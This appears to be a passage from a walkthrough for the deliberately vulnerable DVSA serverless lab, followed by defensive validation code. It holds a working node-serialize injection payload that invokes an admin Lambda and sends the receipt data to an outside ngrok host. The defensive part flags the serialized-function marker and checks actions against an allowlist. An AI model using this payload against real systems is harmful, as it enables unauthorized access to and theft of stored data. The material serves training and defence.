An attacker can leverage the code injection vulnerability to invoke an admin function that discloses all the receipts from the S3 bucket.
Sending the following payload invokes an admin function that packs all the receipts for the specified year and month and creates a signed URL to download them.
{"action": "_$$ND_FUNC$$_function(){var aws=require(\"aws-sdk\");var lambda=new aws.Lambda();var p = {FunctionName: \"DVSA-ADMIN-GET-RECEIPT\", InvocationType: \"RequestResponse\", Payload: JSON.stringify({\"year\": \"2018\", \"month\": \"12\"})};lambda.invoke(p,function(e,d){ var h=require(\"http\");h.get(\"http://0c971764.ngrok.io/lol?data=\"+JSON.stringify(d));}); }()"}
As a result:
Pasting the URL into the browser downloads the receipts from the S3 bucket.
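A defensive counterpart to the payload above, as an added example that is not part of the original page or of DVSA's code: the `_$$ND_FUNC$$_` prefix is the marker node-serialize uses for serialized functions, so a handler can parse the body with `JSON.parse` only and reject any value that carries it. The allowlisted action names and the sample bodies are assumptions constructed for illustration.

```javascript
// node-serialize marks serialized functions with this prefix; plain JSON data never needs it.
const FUNC_MARKER = "_$$ND_FUNC$$_";

// Hypothetical allowlist of actions the public endpoint may dispatch (assumption).
const ALLOWED_ACTIONS = new Set(["new", "get", "cancel"]);

// Recursively collect the paths of string values that carry the function marker.
function findFunctionMarkers(value, path = "$", hits = []) {
  if (typeof value === "string") {
    if (value.includes(FUNC_MARKER)) hits.push(path);
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findFunctionMarkers(v, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      findFunctionMarkers(v, `${path}.${k}`, hits);
    }
  }
  return hits;
}

// Parse with JSON.parse only (data, never code), then validate before dispatch.
function parseRequest(body) {
  let req;
  try {
    req = JSON.parse(body);
  } catch (e) {
    return { ok: false, reason: "invalid-json" };
  }
  if (req === null || typeof req !== "object" || Array.isArray(req)) {
    return { ok: false, reason: "not-an-object" };
  }
  const hits = findFunctionMarkers(req);
  if (hits.length > 0) {
    // Log the paths: a marker in a request body is a strong injection signal.
    return { ok: false, reason: "serialized-function", paths: hits };
  }
  if (typeof req.action !== "string" || !ALLOWED_ACTIONS.has(req.action)) {
    return { ok: false, reason: "unknown-action" };
  }
  return { ok: true, request: req };
}

// Constructed sample bodies; the function bodies are harmless stubs.
const SAMPLES = {
  benign: '{"action": "get", "order-id": "1234"}',
  injected: '{"action": "_$$ND_FUNC$$_function(){ /* stub */ }()"}',
  nested: '{"action": "get", "data": {"note": ["x", "_$$ND_FUNC$$_function(){}()"]}}',
};
```

Input validation limits the injection itself; restricting the public function's IAM role so it cannot invoke `DVSA-ADMIN-GET-RECEIPT` limits what a successful injection can reach.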